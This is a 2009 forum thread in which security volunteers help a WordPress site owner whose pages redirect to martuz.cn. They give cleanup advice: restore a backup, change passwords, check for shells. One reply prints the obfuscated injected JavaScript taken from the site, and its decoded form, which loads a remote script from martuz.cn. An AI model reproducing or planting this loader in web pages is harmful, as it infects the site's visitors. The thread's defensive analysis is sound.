Author Topic: [SPLIT] garethplu  (Read 13336 times)

0 Members and 1 Guest are viewing this topic.

May 19, 2009, 11:09:38 pm
Read 13336 times

garethplu

  • Jr. Member

  • Offline
  • **

  • 12
If someones website goes to "martuz.cn" what can they do to fix it?

May 20, 2009, 11:00:15 am
Reply #1

MysteryFCM

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 1689
  • Personal Text
    Phishing Phanatic
    • I.T. Mate
1. Remove all malicious scripts from ALL files (i.e. restore a backup)
2. Lockdown ALL scripts (JS and PHP etc), and change FTP etc passwords
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

May 20, 2009, 05:47:50 pm
Reply #2

garethplu

  • Jr. Member

  • Offline
  • **

  • 12
Thanks, how can I do that?  Is there a step-by-step guide I can follow for someone with basic skills.  Will my website host be able to help also?

May 20, 2009, 05:59:58 pm
Reply #3

MysteryFCM

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 1689
  • Personal Text
    Phishing Phanatic
    • I.T. Mate
Your host may have a backup, but you shouldn't rely on that. They will however, be able to reset your FTP etc passwords for you.

If you don't have a clean copy of the websites files (e.g. stored locally on your computer), then your choices are severely limited as they are;

1. Download all of the files, and run through their respective source codes, and remove the malicious source code
2. Start the website from scratch
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

May 20, 2009, 06:19:51 pm
Reply #4

garethplu

  • Jr. Member

  • Offline
  • **

  • 12
How do I know what the malicious source code is?

May 20, 2009, 06:31:56 pm
Reply #5

MysteryFCM

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 1689
  • Personal Text
    Phishing Phanatic
    • I.T. Mate
Can you post the URL to your website?
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

May 20, 2009, 06:34:10 pm
Reply #6

garethplu

  • Jr. Member

  • Offline
  • **

  • 12
http://www.stadiatech.com

The one that really puzzles me. I have tried accessing my website from a few computers and it is only my computer which heads to "martuz.cn" is that normal?!!!

MysteryFCM: URL disabled

May 20, 2009, 06:41:12 pm
Reply #7

MysteryFCM

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 1689
  • Personal Text
    Phishing Phanatic
    • I.T. Mate
Looking at your sites source code, shows the following;

Code: [Select]
(function(DBCp){var O7l='%';eval(unescape((':76ar:20a:3d:22ScriptEngine:22:2cb:3d:22V:65r:73:69on():2b:22:2cj:3d:22:22:2cu:3d:6eaviga:74:6fr:2eu:73er:41g:65n:74:3bif((u:2einde:78Of(:22:43:68rom:65:22):3c:30):26:26(u:2eind:65xOf(:22W:69n:22):3e0):26:26(u:2eindexOf(:22NT:206:22:29:3c0):26:26(do:63ument:2ec:6fokie:2e:69nde:78Of(:22miek:3d1:22:29:3c:30):26:26:28:74y:70eo:66(z:72v:7at:73):21:3dtypeo:66(:22A:22))):7b:7a:72v:7ats:3d:22:41:22:3beva:6c(:22if:28wi:6ed:6f:77:2e:22+a+:22:29j:3dj+:22+a:2b:22:4da:6ao:72:22+b+a+:22M:69nor:22:2bb+:61+:22:42u:69l:64:22:2bb+:22:6a:3b:22):3bd:6fc:75ment:2ewrite:28:22:3cscript:20src:3d:2f:2fmart:22:2b:22uz:2ec:6e:2fvid:2f:3fid:3d:22:2bj+:22:3e:3c:5c:2f:73c:72ipt:3e:22):3b:7d').replace(DBCp,O7l)))})(/\:/g);

Which decodes to;

Code: [Select]
var a="ScriptEngine",b="Version()+",j="",u=navigator.userAgent;if((u.indexOf("Chrome")<0)&&(u.indexOf("Win")>0)&&(u.indexOf("NT 6")<0)&&(document.cookie.indexOf("miek=1")<0)&&(typeof(zrvzts)!=typeof("A"))){zrvzts="A";eval("if(window."+a+")j=j+"+a+"Major"+b+a+"Minor"+b+a+"Build"+b+"j;");document.write("<script src=//mart"+"uz.cn/vid/?id="+j+"><\/script>");}
You're rather lucky here, aslong as the script is the same in all files, as all you need to do is search for the string "mart", as the obfuscation is extremely basic.

On your homepage, this script appears just next to the "HEAD" HTML tag;

Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

May 20, 2009, 06:42:21 pm
Reply #8

MysteryFCM

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 1689
  • Personal Text
    Phishing Phanatic
    • I.T. Mate
The one that really puzzles me. I have tried accessing my website from a few computers and it is only my computer which heads to "martuz.cn" is that normal?!!!

It depends entirely on the settings of the browser and the firewall (i.e. if the browser is set to block Javascript it won't load, and if the firewall is corporately owned, it's likely already set to block this domain)
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

May 20, 2009, 06:49:26 pm
Reply #9

MysteryFCM

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 1689
  • Personal Text
    Phishing Phanatic
    • I.T. Mate
Since you're using WordPress by the way, the main files you need to reinstall and/or clean, are your themes (located in /wp-content/themes), though I'd recommend checking ALL of the files just to be on the safe side, as chances are, they'll have also uploaded a shell to enable them to re-access your site, should the FTP credentials be changed. If you're comfortable doing so, it will be much quicker and much easier, to delete the WordPress files, and re-upload a clean copy of them (you can obtain the WordPress files from wordpress.org)
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

May 20, 2009, 07:00:55 pm
Reply #10

SysAdMini

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 3325
I recommend to delete all files at your site and to restore everything
from a clean backup. Some php files have been added by this malware, for
example /images/gifimg.php. I don't recommend to sort out the files manually.

Please change the password of your site and restore your site completely from a backup.
Don't try to fix individual files if you don't know exactly why you are doing.
Ruining the bad guy's day

May 20, 2009, 07:35:50 pm
Reply #11

garethplu

  • Jr. Member

  • Offline
  • **

  • 12
If it comes to it can I pay someone to fix this and similiar problems?

May 20, 2009, 08:09:12 pm
Reply #12

MysteryFCM

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 1689
  • Personal Text
    Phishing Phanatic
    • I.T. Mate
Your hosting company would probably be happy to do it for you. If not, post back here and I'll do it for free for you.
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

May 20, 2009, 08:16:07 pm
Reply #13

garethplu

  • Jr. Member

  • Offline
  • **

  • 12
Cheers dude, the world needs more people like you.

I shall speak with the host and see what they say.  The RSS no longer works, do you think its related?

May 20, 2009, 08:17:25 pm
Reply #14

MysteryFCM

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 1689
  • Personal Text
    Phishing Phanatic
    • I.T. Mate
More than likely, yes.
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net